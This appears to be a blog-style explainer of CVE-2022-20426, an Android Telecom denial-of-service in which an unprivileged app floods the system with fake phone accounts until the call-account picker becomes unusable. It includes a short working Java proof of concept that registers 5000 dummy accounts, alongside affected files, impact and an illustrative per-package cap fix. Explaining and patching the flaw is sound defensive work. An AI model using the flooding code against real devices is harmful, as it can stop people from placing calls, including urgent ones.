When talking about Android security, resource exhaustion bugs can be a silent killer. They rarely make headlines the way remote code execution or privilege escalation do, but a well-placed denial of service (DoS) can do real harm, especially when it breaks something as basic as placing a phone call. Today we'll focus on CVE-2022-20426, a local denial-of-service vulnerability in the way Android lets users pick which phone account a call should go out on.

This bug affects a wide range of Android versions (Android 10, 11, 12, 12L and 13) and is tracked under Android's own AOSP bug ID A-236263294.

What’s the Problem?

At a high level, CVE-2022-20426 is a resource exhaustion problem in the functions and files that manage phone accounts. A malicious local app with NO special permissions can flood the system with a very large number of fake phone accounts. Once that has happened, Android's "choose a phone account" dialog fails to load, crashes, or takes so long to respond that it is unusable, and the user can no longer place calls through the account they actually want. No elevated execution privileges are needed, and the app does not need any user interaction to set this up.

To be clear: this is NOT a code execution flaw, but a denial-of-service (DoS). Still, it can be seriously disruptive.

Device types:

Any device running one of the affected releases is in scope. Dual-SIM hardware is the most common reason the account selector appears, but it is not a prerequisite: the selector is driven by the list of registered phone accounts, which is exactly what the malicious app controls.

Attack Surface

The Android Telephony and Telecom system manages a list of “phone accounts.” When you place a call, especially on dual SIM devices, you might get a pop-up to pick the account you want to use.

Under the hood, any app that declares a ConnectionService can *register* new phone accounts through Android's TelecomManager.registerPhoneAccount() API. Telecom was written on the assumption that a package registers a handful of accounts. What happens if a malicious app registers thousands of dummy accounts instead?

1. A malicious app is installed (no special permissions needed).
2. The app registers hundreds or thousands of fake PhoneAccount objects through the public registerPhoneAccount() method.
3. The user places a call in the normal way. The app needs no user interaction of its own; the user's ordinary call is what trips the bug.
4. The system tries to render the "select phone account" UI.
5. Resource exhaustion from the huge account list causes the UI to freeze, crash, or become unresponsive.

Simple Proof-of-Concept Code Snippet

Below is a simplified example. DO NOT run this on a production device! It registers thousands of dummy phone accounts. It assumes MyConnectionService is declared in the app manifest as a service protected by android.permission.BIND_TELECOM_CONNECTION_SERVICE, which Telecom requires before it will accept a PhoneAccount that points at that service; no runtime permission is needed beyond that.

import android.content.ComponentName;
import android.content.Context;
import android.telecom.PhoneAccount;
import android.telecom.PhoneAccountHandle;
import android.telecom.TelecomManager;
import java.util.ArrayList;
import java.util.List;

// Number of dummy accounts; a few thousand is enough to reproduce the stall.
final int ACCOUNT_COUNT = 5000;
TelecomManager tm = (TelecomManager) context.getSystemService(Context.TELECOM_SERVICE);
List<PhoneAccountHandle> handles = new ArrayList<>();

for (int i = 0; i < ACCOUNT_COUNT; i++) {
    // A handle is the app's ConnectionService component plus a unique id string.
    PhoneAccountHandle handle = new PhoneAccountHandle(
        new ComponentName(context, MyConnectionService.class),
        "FakeAccount" + i
    );
    PhoneAccount account = PhoneAccount.builder(handle, "FakeAccount" + i)
        .setCapabilities(PhoneAccount.CAPABILITY_CALL_PROVIDER)
        .build();
    tm.registerPhoneAccount(account);   // accepted as long as the service is declared
    handles.add(handle);                // kept only so the accounts can be removed again
}

Cleanup: a well-behaved app would eventually call tm.unregisterPhoneAccount(handle); for every handle it kept in the list above. A malicious app never would.

What Files & Functions Are Affected?

The bug spans several files that handle the list of PhoneAccountHandles and how that list is shown in the selector UI. For example:

- com/android/server/telecom/PhoneAccountRegistrar.java
- com/android/server/telecom/CallsManager.java

These components are responsible for storing, managing and presenting the available PhoneAccounts. Before the fix, none of them placed a practical upper limit on the number of accounts a package could register, so resource use was unbounded.

Impact

- DoS to the dialer: users cannot select a phone account, which stalls calls they may urgently need to make.
- Local attacker only: no elevated permissions required.
- Persistence: Telecom persists registered phone accounts, so a reboot does not clear them. The fake accounts stay until the malicious app unregisters them or is uninstalled, at which point Telecom drops that package's accounts.

Original References

- Android Security Bulletin, November 2022 (the bulletin that disclosed this CVE; the page's own timeline shows publication on 2022-11-08)
- NVD CVE page (CVE-2022-20426)
- AOSP Issue Tracker: A-236263294 (restricted access)

Google's fix (security patch level 2022-11-01 or later for the affected Android versions) involves:

- Placing a hard upper bound on how many phone accounts each app can register.
- Limiting the total number of phone accounts that the UI has to present.

Device vendors pushed this patch via regular security updates. If you’re on an older Android device without security updates, you could still be at risk.
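To make the shape of the fix concrete, here is an added example of a registrar with a per-package registration cap. It is illustrative code written for this article, not the AOSP patch and not Telecom's real classes; the limit value, the Handle record and the package names are assumptions. It runs the same loop as the proof of concept above against the capped registrar and shows that a second package is unaffected by the first one's spam:

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

// Illustrative model of a per-package registration cap. This is not the AOSP
// patch and does not use the real Telecom classes; the limit value, the Handle
// record and the package names are assumptions made for the example.
public class CappedRegistrar {

    // Assumed cap. The platform picks the real number; what matters is that
    // one package can no longer grow the list without bound.
    static final int MAX_ACCOUNTS_PER_PACKAGE = 10;

    // Stand-in for PhoneAccountHandle: the owning package plus a unique id.
    record Handle(String packageName, String id) {}

    private final Map<String, List<Handle>> byPackage = new HashMap<>();

    // Returns true when the account is (re)registered, false when the cap
    // rejects it. Re-registering an existing id replaces the account and
    // must not consume another slot, otherwise a legitimate app that updates
    // its own account on every launch would lock itself out.
    public boolean register(Handle h) {
        List<Handle> owned =
            byPackage.computeIfAbsent(h.packageName(), k -> new ArrayList<>());
        if (owned.contains(h)) {
            return true;
        }
        if (owned.size() >= MAX_ACCOUNTS_PER_PACKAGE) {
            return false;
        }
        owned.add(h);
        return true;
    }

    public boolean unregister(Handle h) {
        List<Handle> owned = byPackage.get(h.packageName());
        return owned != null && owned.remove(h);
    }

    public int countFor(String packageName) {
        List<Handle> owned = byPackage.get(packageName);
        return owned == null ? 0 : owned.size();
    }

    public int total() {
        int n = 0;
        for (List<Handle> l : byPackage.values()) {
            n += l.size();
        }
        return n;
    }

    public static void main(String[] args) {
        CappedRegistrar reg = new CappedRegistrar();

        // The same loop as the proof of concept, now against the capped registrar.
        int accepted = 0;
        int rejected = 0;
        for (int i = 0; i < 5000; i++) {
            if (reg.register(new Handle("com.example.spammer", "FakeAccount" + i))) {
                accepted++;
            } else {
                rejected++;
            }
        }
        System.out.println("spammer accepted=" + accepted + " rejected=" + rejected);

        // A second package is unaffected by the first one's registrations.
        boolean ok = reg.register(new Handle("com.example.voip", "work"));
        System.out.println("voip registered=" + ok
            + " total accounts=" + reg.total());

        // Updating an existing account does not consume a new slot.
        boolean again = reg.register(new Handle("com.example.voip", "work"));
        System.out.println("voip re-registered=" + again
            + " voip count=" + reg.countFor("com.example.voip"));
    }
}
```

The two details worth copying from this model are that the cap is keyed on the owning package rather than on the global list, so one misbehaving app cannot crowd out everybody else, and that re-registration of an existing id is not charged against the cap, so the limit blocks the spam loop without breaking apps that refresh their own account.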

Summary

CVE-2022-20426 might seem like a minor issue — after all, nobody’s breaking into your device with it. But a DoS like this can really hurt reliability, especially when you need to use your phone fast. Attackers don’t need special permissions or any user interaction, so this is a bug everyone should care about patching.

If you want to learn more, read the Android Security Bulletin referenced above, and always keep your OS up to date.

Stay safe—and if you’re curious, always tinker on a safe test device.


Timeline

Published on: 11/08/2022 22:15:00 UTC
Last modified on: 11/09/2022 14:48:00 UTC